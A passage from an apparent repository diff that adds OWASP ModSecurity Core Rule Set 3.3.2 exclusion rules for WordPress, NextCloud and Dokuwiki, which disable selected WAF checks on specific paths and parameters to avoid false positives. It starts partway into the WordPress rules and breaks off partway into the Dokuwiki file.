ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Content editing ]
#
# Edit posts and pages
# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp]
# - Themes do not properly escape post_title in HTML, so beware of XSS
# and be conservative in excluding this parameter.
# - Parameter _wp_http_referer can appear multiple times.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \
"id:9002700,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@rx ^(?:edit|editpost)$" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
ctl:ruleRemoveById=920272,\
ctl:ruleRemoveById=921180"
# Autosave posts and pages
# ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002710,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq heartbeat" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\
ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\
ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\
ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\
ctl:ruleRemoveById=921180,\
ctl:ruleRemoveById=920272"
# Edit menus
SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \
"id:9002720,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq update" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\
ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\
ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data"
# Edit text widgets (can contain custom HTML)
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002730,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]"
# Reorder widgets
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002740,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq widgets-order" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\
ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\
ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]"
# Create permalink sample for new post
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002750,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq sample-permalink" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title"
# Add external link to menu
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002760,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq add-menu-item" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]"
# Editor: Add Media, Insert Media, Insert into page
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
"id:9002770,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq send-attachment-to-editor" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html"
#
# [ Options and Settings ]
#
# Change site URL
SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \
"id:9002800,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:option_page "@streq general" \
"t:none,\
chain"
SecRule &ARGS:option_page "@eq 1" \
"t:none,\
chain"
SecRule ARGS:action "@streq update" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=931130;ARGS:home,\
ctl:ruleRemoveTargetById=931130;ARGS:siteurl"
# Permalink settings
# permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/
SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \
"id:9002810,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=920230;ARGS:selection,\
ctl:ruleRemoveTargetById=920272;ARGS:selection,\
ctl:ruleRemoveTargetById=942431;ARGS:selection,\
ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\
ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\
ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\
ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\
ver:'OWASP_CRS/3.3.2'"
# Comments blacklist and moderation list
SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \
"id:9002820,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:option_page "@streq discussion" \
"t:none,\
chain"
SecRule &ARGS:option_page "@eq 1" \
"t:none,\
chain"
SecRule ARGS:action "@streq update" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys"
# Posts/pages overview search
SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \
"id:9002830,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Helpers ]
#
# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common,
# admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,
# jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D=
# wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget,
# jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1
#
# /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,
# admin-bar,buttons,media-views,common,forms,admin-menu,dashboard,
# list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D=
# s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1
#
# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common,
# admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer,
# wp-ajax-response,jquery-color,wp-lists,quicktags,
# jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core,
# jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore,
# customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install,
# wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter,
# jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e
SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \
"id:9002900,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=921180,\
ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\
ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\
ctl:ruleRemoveTargetById=942360;ARGS:load[],\
ctl:ruleRemoveTargetById=942430;ARGS:load[],\
ctl:ruleRemoveTargetById=942431;ARGS:load[],\
ctl:ruleRemoveTargetById=942432;ARGS:load[],\
ver:'OWASP_CRS/3.3.2'"
SecMarker "END-WORDPRESS-ADMIN"
SecMarker "END-WORDPRESS"

415
core/modsecurity/files/coreruleset/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,415 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
#
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default NextCloud install.
# They will likely work with OwnCloud too, but you may have to modify them.
# The exclusions are only active if crs_exclusions_nextcloud=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
#
# To relax upload restrictions for only the php files that need it,
# you put something like this in crs-setup.conf:
#
# SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \
# "id:9003330,\
# phase:1,\
# t:none,\
# nolog,\
# pass,\
# tx.restricted_extensions='.bak/ .config/ .conf/'"
#
# Large uploads can be modified with SecRequestBodyLimit. Or they
# can be more controlled by using the following:
#
# SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \
# "id:9003610,\
# phase:1,\
# t:none,\
# nolog,\
# ctl:requestBodyLimit=1073741824"
#
# ---------------------
SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \
"id:9003000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-NEXTCLOUD"
SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \
"id:9003001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-NEXTCLOUD"
#
# [ File Manager ]
#
#
# The web interface uploads files, and interacts with the user.
SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \
"id:9003100,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveByTag=attack-injection-php,\
ctl:ruleRemoveById=941000-942999,\
ctl:ruleRemoveById=951000-951999,\
ctl:ruleRemoveById=953100-953130,\
ctl:ruleRemoveById=920420,\
ctl:ruleRemoveById=920440,\
ver:'OWASP_CRS/3.3.2'"
# Skip PUT parsing for invalid encoding / protocol violations in binary files.
SecRule REQUEST_METHOD "@streq PUT" \
"id:9003105,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \
"t:none,\
ctl:ruleRemoveById=920000-920999,\
ctl:ruleRemoveById=932000-932999,\
ctl:ruleRemoveById=921150,\
ctl:ruleRemoveById=930110,\
ctl:ruleRemoveById=930120"
# Allow the data type 'text/vcard'
SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
"id:9003110,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"
# Allow the data type 'application/octet-stream'
SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \
"id:9003115,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \
"setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'"
# Allow data types like video/mp4
SecRule REQUEST_METHOD "@streq PUT" \
"id:9003116,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \
"ctl:ruleRemoveById=920340,\
ctl:ruleRemoveById=920420"
# Allow characters like /../ in files.
# Allow all kind of filetypes.
# Allow source code.
SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
"id:9003120,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=930100-930110,\
ctl:ruleRemoveById=951000-951999,\
ctl:ruleRemoveById=953100-953130,\
ctl:ruleRemoveById=920440,\
ver:'OWASP_CRS/3.3.2'"
# Allow REPORT requests without Content-Type header (at least the iOS app does this)
SecRule REQUEST_METHOD "@streq REPORT" \
"id:9003121,\
phase:2,\
pass,\
t:none,\
nolog,\
chain"
SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \
"t:none,\
ctl:ruleRemoveById=920340"
# [ Searchengine ]
#
# NexCloud uses a search field for filename or content queries.
SecRule REQUEST_FILENAME "@contains /index.php/core/search" \
"id:9003125,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\
ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\
ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\
ver:'OWASP_CRS/3.3.2'"
# [ DAV ]
#
# NextCloud uses DAV methods with index.php and remote.php to do many things
# The default ones in ModSecurity are: GET HEAD POST OPTIONS
#
# Looking through the code, and via testing, I found these:
#
# File manager: PUT DELETE MOVE PROPFIND PROPPATCH
# Calendars: REPORT
# Others in the code or js files: PATCH MKCOL MOVE TRACE
# Others that I added just in case, and they seem related:
# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK.
SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \
"id:9003130,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'"
# We need to allow DAV methods for sharing files, and removing shares
# DELETE - when the share is removed
# PUT - when setting a password / expiration time
SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \
"id:9003140,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'"
# [ Preview and Thumbnails ]
SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \
"id:9003150,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=932150;ARGS:file,\
ver:'OWASP_CRS/3.3.2'"
# Filepreview for trashbin
SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \
"id:9003155,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=932150;ARGS:file,\
ctl:ruleRemoveTargetById=942190;ARGS:file,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \
"id:9003160,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\
ver:'OWASP_CRS/3.3.2'"
# [ Ownnote ]
SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \
"id:9003300,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=941150,\
ver:'OWASP_CRS/3.3.2'"
# [ Text Editor ]
#
# This file can save anything, and it's name could be lots of things.
SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \
"id:9003310,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\
ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\
ctl:ruleRemoveTargetById=932150;ARGS:filename,\
ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\
ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\
ver:'OWASP_CRS/3.3.2'"
# [ Address Book ]
#
# Allow the data type 'text/vcard'
SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
"id:9003320,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'"
# Allow modifying contacts via the web interface
SecRule REQUEST_METHOD "@streq PUT" \
"id:9003321,\
phase:1,\
pass,\
t:none,\
nolog,\
chain"
SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \
"t:none,\
ctl:ruleRemoveById=200002"
# [ Calendar ]
#
# Allow the data type 'text/calendar'
SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
"id:9003330,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'"
# Allow modifying calendar events via the web interface
SecRule REQUEST_METHOD "@streq PUT" \
"id:9003331,\
phase:1,\
pass,\
t:none,\
nolog,\
chain"
SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \
"t:none,\
ctl:ruleRemoveById=200002"
# [ Notes ]
#
# We want to allow a lot of things as the user is
# allowed to note on anything.
SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \
"id:9003340,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveByTag=attack-injection-php,\
ver:'OWASP_CRS/3.3.2'"
# [ Bookmarks ]
#
# Allow urls in data.
SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \
"id:9003350,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=931130,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Login forms ]
#
# This removes checks on the 'password' and related fields:
# User login password.
SecRule REQUEST_FILENAME "@contains /index.php/login" \
"id:9003400,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
ver:'OWASP_CRS/3.3.2'"
# Reset password.
SecRule REQUEST_FILENAME "@endsWith /index.php/login" \
"id:9003410,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq resetpass" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
# Change Password and Setting up a new user/password
SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \
"id:9003500,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
ver:'OWASP_CRS/3.3.2'"
SecMarker "END-NEXTCLOUD-ADMIN"
SecMarker "END-NEXTCLOUD"

272
core/modsecurity/files/coreruleset/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,272 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
#
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default Dokuwiki install.
# The exclusions are only active if crs_exclusions_dokuwiki=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
#
# Note, if you want to relax the upload restrictions,
# see rule 900240. For Dokuwiki you can limit the exception
# to the ajax.php file:
#
# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ...
#
SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \
"id:9004000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DOKUWIKI"
SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \
"id:9004001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DOKUWIKI"
#
# -=[ Dokuwiki Front-End ]=-
#
# Note on files specified:
# /doku.php: shows pages, saves, edits, admin
# /lib/exe/ajax.php: autosave, uploads
#
# Allow pages to be edited, and ajax to save drafts.
#
# ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things,
# as the page (in part or whole) is passed via 'suffix/prefix' at times.
# attack-protocol (921110-921160/920230): Allows odd characters on the page.
# CRS: (still need attack-protocol specified.)
# attack-injection-php (930000-933999): Allows code on page.
# attack-sqli (940000-942999): Allows SQL expressions on page.
#
# Others:
# 930100-930110;REQUEST_BODY: if there's a /../ in the text.
#
# ARGS:summary (the text in the 'summary' box on page edits.):
# Allowing 930120-930130 lets user save summaries with
# system file names. This should not be needed in normal
# use. But leaving a note here of how to allow in rule below:
# ctl:ruleRemoveTargetById=930120;ARGS:summary
# ctl:ruleRemoveTargetById=930130;ARGS:summary
#
# Also, can't specify:
# SecRule ARGS:do "@streq edit" \
# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\
# because at times the do=edit can get dropped, so if we use
# above the edit will get blocked when the page is saved.
# Hint: those using .htaccess rewrites can remove/replace
# this first 'SecRule...' line with 'SecAction \' (unsupported).
SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \
"id:9004100,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"t:none,\
chain"
SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
"t:none,\
ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\
ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\
ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\
ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY"
# Allow it to upload files. But check for cookies just to make sure.
SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \
"id:9004110,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"t:none,\
chain"
SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
"t:none,\
setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'"
# Show the index, even if things like "postgresql" or other things show up.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
"id:9004130,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:do "@streq index" \
"t:none,\
chain"
SecRule &ARGS:do "@eq 1" \
"t:none,\
ctl:ruleRemoveById=951240,\
ctl:ruleRemoveById=953110"
#
# [ Login form ]
#
# Turn off checks for password.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
"id:9004200,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:do "@streq login" \
"t:none,\
chain"
SecRule &ARGS:do "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p"
#
# [ Admin Area ]
#
# Skip this section for performance unless do=admin is in request
SecRule ARGS:do "!@streq admin" \
"id:9004300,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DOKUWIKI-ADMIN"
SecRule ARGS:do "!@streq admin" \
"id:9004310,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DOKUWIKI-ADMIN"
# [ Reset password ]
#
# Turn off checks for pass1, pass1-text, pass2
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
"id:9004320,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:do "@streq login" \
